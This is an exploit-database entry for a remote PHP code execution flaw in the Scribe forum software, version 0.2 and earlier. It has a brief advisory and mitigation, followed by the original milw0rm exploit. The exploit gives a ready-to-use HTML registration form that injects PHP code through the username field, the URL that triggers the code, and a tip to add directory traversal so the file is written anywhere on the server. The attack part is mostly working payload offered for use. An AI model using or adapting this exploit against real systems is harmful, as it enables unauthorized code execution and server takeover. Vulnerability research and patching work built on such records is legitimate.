Scribe - exploit.company

vendor:

Scribe

by:

KiNgOfThEwOrLd

7.5

CVSS

HIGH

Remote PHP Code Execution

CWE

Product Name: Scribe

Affected Version From:

Affected Version To: 0.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Scribe <= 0.2 Remote PHP Code Execution

When registering a new user in Scribe <= 0.2, a file with the username is created in the /regged/ directory. The file contains the username. An attacker can exploit this by injecting PHP code in the username field during registration, which will be executed on the target server when accessing the generated file.

Mitigation:

Upgrade to a newer version of Scribe that fixes this vulnerability. Remove any potentially malicious usernames from the /regged/ directory.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

	Scribe <= 0.2 Remote PHP Code Execution
   Download: http://sourceforge.net/projects/scribe/

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC:

When we register a news user, scribe make a file called [username].php located 
in /regged/. The file contains:

Username: [username]
---------------------------------------------------------------
Exploit:

<form id="Register" action="http://[target]/[scribe_path]/forum.php?act=7" 
method="post">
<input maxlength="99999999999" name="username" type="text" value="<script 
language=php>[YOUR_PHP_CODE]"><br>
<input maxlength="32" name="password" type="password" value="kingolo"><br>
<input maxlength="32" name="cpassword" type="password" value="kingolo"><br>
<input maxlength="50" name="email" type="text" value="kingolo"><br>
<input name="confirm" value="Make Shell!" type="submit">
</form>

Now, go on:

http://[target]/[scribe_path]/regged/<script language=php>[YOUR_PHP_CODE].php

And your code will be execute on target server!
---------------------------------------------------------------
Trick:

If you insert directory traversal variable in your username, u can save the 
file where u want  ;) 
---------------------------------------------------------------

# milw0rm.com [2007-11-02]